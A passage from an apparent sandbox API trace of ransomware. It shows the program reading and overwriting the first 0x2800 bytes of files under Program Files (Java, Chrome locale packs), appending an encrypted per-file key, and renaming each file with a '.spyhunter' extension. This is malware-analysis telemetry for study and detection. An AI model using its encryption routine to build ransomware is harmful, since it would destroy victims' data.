liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.665] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e434, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e434*=0x2800, lpOverlapped=0x0) returned 1 [0175.666] GetProcessHeap () returned 0x2c0000 [0175.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0175.666] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.666] WriteFile (in: hFile=0x178, lpBuffer=0x248e474*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e434, lpOverlapped=0x0 | out: lpBuffer=0x248e474*, lpNumberOfBytesWritten=0x248e434*=0x4, lpOverlapped=0x0) returned 1 [0175.668] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e434, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e434*=0x30, lpOverlapped=0x0) returned 1 [0175.668] CloseHandle (hObject=0x178) returned 1 [0175.668] GetProcessHeap () returned 0x2c0000 [0175.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.668] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll.spyhunter") returned 58 [0175.669] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\awt.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\awt.dll.spyhunter")) returned 1 [0175.670] GetProcessHeap () returned 0x2c0000 [0175.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.670] GetProcessHeap () returned 0x2c0000 [0175.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0175.670] GetProcessHeap () returned 0x2c0000 [0175.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20650 | out: hHeap=0x2c0000) returned 1 [0175.670] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e470 | out: pbBuffer=0x248e470) returned 1 [0175.670] GetProcessHeap () returned 0x2c0000 [0175.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0175.671] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e468*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e468*=0x30) returned 1 [0175.671] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\nacl_irt_x86_64.nexe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\nacl_irt_x86_64.nexe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.672] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\nacl_irt_x86_64.nexe") returned 87 [0175.672] StrStrW (lpFirst="nacl_irt_x86_64.nexe", lpSrch=".txt") returned 0x0 [0175.672] GetProcessHeap () returned 0x2c0000 [0175.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0175.672] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e42c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e42c*=0x2800, lpOverlapped=0x0) returned 1 [0175.711] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.712] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e42c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e42c*=0x2800, lpOverlapped=0x0) returned 1 [0175.712] GetProcessHeap () returned 0x2c0000 [0175.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0175.712] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.712] WriteFile (in: hFile=0x178, lpBuffer=0x248e46c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e42c, lpOverlapped=0x0 | out: lpBuffer=0x248e46c*, lpNumberOfBytesWritten=0x248e42c*=0x4, lpOverlapped=0x0) returned 1 [0175.714] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e42c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e42c*=0x30, lpOverlapped=0x0) returned 1 [0175.714] CloseHandle (hObject=0x178) returned 1 [0175.714] GetProcessHeap () returned 0x2c0000 [0175.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.714] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\nacl_irt_x86_64.nexe.spyhunter") returned 97 [0175.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\nacl_irt_x86_64.nexe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\nacl_irt_x86_64.nexe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\nacl_irt_x86_64.nexe.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\nacl_irt_x86_64.nexe.spyhunter")) returned 1 [0175.716] GetProcessHeap () returned 0x2c0000 [0175.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.716] GetProcessHeap () returned 0x2c0000 [0175.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0175.716] GetProcessHeap () returned 0x2c0000 [0175.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca888 | out: hHeap=0x2c0000) returned 1 [0175.716] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e470 | out: pbBuffer=0x248e470) returned 1 [0175.716] GetProcessHeap () returned 0x2c0000 [0175.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0175.717] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e468*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e468*=0x30) returned 1 [0175.717] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-CN.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-cn.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.718] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-CN.pak") returned 84 [0175.718] StrStrW (lpFirst="zh-CN.pak", lpSrch=".txt") returned 0x0 [0175.718] GetProcessHeap () returned 0x2c0000 [0175.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0175.718] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e42c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e42c*=0x2800, lpOverlapped=0x0) returned 1 [0175.726] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.726] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e42c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e42c*=0x2800, lpOverlapped=0x0) returned 1 [0175.727] GetProcessHeap () returned 0x2c0000 [0175.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0175.727] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.727] WriteFile (in: hFile=0x178, lpBuffer=0x248e46c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e42c, lpOverlapped=0x0 | out: lpBuffer=0x248e46c*, lpNumberOfBytesWritten=0x248e42c*=0x4, lpOverlapped=0x0) returned 1 [0175.733] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e42c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e42c*=0x30, lpOverlapped=0x0) returned 1 [0175.733] CloseHandle (hObject=0x178) returned 1 [0175.733] GetProcessHeap () returned 0x2c0000 [0175.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.733] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-CN.pak.spyhunter") returned 94 [0175.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-CN.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-cn.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-CN.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-cn.pak.spyhunter")) returned 1 [0175.736] GetProcessHeap () returned 0x2c0000 [0175.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.736] GetProcessHeap () returned 0x2c0000 [0175.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0175.736] GetProcessHeap () returned 0x2c0000 [0175.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca698 | out: hHeap=0x2c0000) returned 1 [0175.736] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e468 | out: pbBuffer=0x248e468) returned 1 [0175.736] GetProcessHeap () returned 0x2c0000 [0175.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0175.736] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e460*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e460*=0x30) returned 1 [0175.737] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\uk.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\uk.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.738] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\uk.pak") returned 81 [0175.738] StrStrW (lpFirst="uk.pak", lpSrch=".txt") returned 0x0 [0175.738] GetProcessHeap () returned 0x2c0000 [0175.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0175.738] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e424, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e424*=0x2800, lpOverlapped=0x0) returned 1 [0175.758] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.758] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e424, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e424*=0x2800, lpOverlapped=0x0) returned 1 [0175.759] GetProcessHeap () returned 0x2c0000 [0175.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0175.760] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.760] WriteFile (in: hFile=0x178, lpBuffer=0x248e464*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e424, lpOverlapped=0x0 | out: lpBuffer=0x248e464*, lpNumberOfBytesWritten=0x248e424*=0x4, lpOverlapped=0x0) returned 1 [0175.780] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e424, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e424*=0x30, lpOverlapped=0x0) returned 1 [0175.788] CloseHandle (hObject=0x178) returned 1 [0175.796] GetProcessHeap () returned 0x2c0000 [0175.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.796] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\uk.pak.spyhunter") returned 91 [0175.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\uk.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\uk.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\uk.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\uk.pak.spyhunter")) returned 1 [0175.798] GetProcessHeap () returned 0x2c0000 [0175.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.798] GetProcessHeap () returned 0x2c0000 [0175.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0175.798] GetProcessHeap () returned 0x2c0000 [0175.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ece560 | out: hHeap=0x2c0000) returned 1 [0175.798] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e468 | out: pbBuffer=0x248e468) returned 1 [0175.798] GetProcessHeap () returned 0x2c0000 [0175.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0175.798] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e460*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e460*=0x30) returned 1 [0175.799] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sw.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sw.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0175.799] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sw.pak") returned 81 [0175.799] StrStrW (lpFirst="sw.pak", lpSrch=".txt") returned 0x0 [0175.799] GetProcessHeap () returned 0x2c0000 [0175.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.799] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e424, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e424*=0x2800, lpOverlapped=0x0) returned 1 [0175.822] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.822] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e424, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e424*=0x2800, lpOverlapped=0x0) returned 1 [0175.822] GetProcessHeap () returned 0x2c0000 [0175.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.822] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.823] WriteFile (in: hFile=0x9c, lpBuffer=0x248e464*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e424, lpOverlapped=0x0 | out: lpBuffer=0x248e464*, lpNumberOfBytesWritten=0x248e424*=0x4, lpOverlapped=0x0) returned 1 [0175.824] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e424, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e424*=0x30, lpOverlapped=0x0) returned 1 [0175.824] CloseHandle (hObject=0x9c) returned 1 [0175.824] GetProcessHeap () returned 0x2c0000 [0175.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.824] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sw.pak.spyhunter") returned 91 [0175.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sw.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sw.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sw.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sw.pak.spyhunter")) returned 1 [0175.826] GetProcessHeap () returned 0x2c0000 [0175.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.826] GetProcessHeap () returned 0x2c0000 [0175.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0175.826] GetProcessHeap () returned 0x2c0000 [0175.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ece0b0 | out: hHeap=0x2c0000) returned 1 [0175.826] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e460 | out: pbBuffer=0x248e460) returned 1 [0175.826] GetProcessHeap () returned 0x2c0000 [0175.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0175.826] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e458*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e458*=0x30) returned 1 [0175.826] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sl.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sl.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0175.827] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sl.pak") returned 81 [0175.827] StrStrW (lpFirst="sl.pak", lpSrch=".txt") returned 0x0 [0175.827] GetProcessHeap () returned 0x2c0000 [0175.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.827] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e41c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e41c*=0x2800, lpOverlapped=0x0) returned 1 [0175.984] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.985] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e41c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e41c*=0x2800, lpOverlapped=0x0) returned 1 [0175.985] GetProcessHeap () returned 0x2c0000 [0175.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.985] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.985] WriteFile (in: hFile=0x9c, lpBuffer=0x248e45c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e41c, lpOverlapped=0x0 | out: lpBuffer=0x248e45c*, lpNumberOfBytesWritten=0x248e41c*=0x4, lpOverlapped=0x0) returned 1 [0176.028] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e41c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e41c*=0x30, lpOverlapped=0x0) returned 1 [0176.028] CloseHandle (hObject=0x9c) returned 1 [0176.083] GetProcessHeap () returned 0x2c0000 [0176.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.083] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sl.pak.spyhunter") returned 91 [0176.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sl.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sl.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sl.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sl.pak.spyhunter")) returned 1 [0176.085] GetProcessHeap () returned 0x2c0000 [0176.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.085] GetProcessHeap () returned 0x2c0000 [0176.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.085] GetProcessHeap () returned 0x2c0000 [0176.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecdde0 | out: hHeap=0x2c0000) returned 1 [0176.085] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e460 | out: pbBuffer=0x248e460) returned 1 [0176.085] GetProcessHeap () returned 0x2c0000 [0176.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.085] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e458*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e458*=0x30) returned 1 [0176.085] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pl.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pl.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0176.086] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pl.pak") returned 81 [0176.086] StrStrW (lpFirst="pl.pak", lpSrch=".txt") returned 0x0 [0176.086] GetProcessHeap () returned 0x2c0000 [0176.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.086] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e41c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e41c*=0x2800, lpOverlapped=0x0) returned 1 [0176.095] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.095] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e41c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e41c*=0x2800, lpOverlapped=0x0) returned 1 [0176.095] GetProcessHeap () returned 0x2c0000 [0176.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.095] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.095] WriteFile (in: hFile=0xb0, lpBuffer=0x248e45c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e41c, lpOverlapped=0x0 | out: lpBuffer=0x248e45c*, lpNumberOfBytesWritten=0x248e41c*=0x4, lpOverlapped=0x0) returned 1 [0176.109] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e41c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e41c*=0x30, lpOverlapped=0x0) returned 1 [0176.109] CloseHandle (hObject=0xb0) returned 1 [0176.109] GetProcessHeap () returned 0x2c0000 [0176.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.109] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, 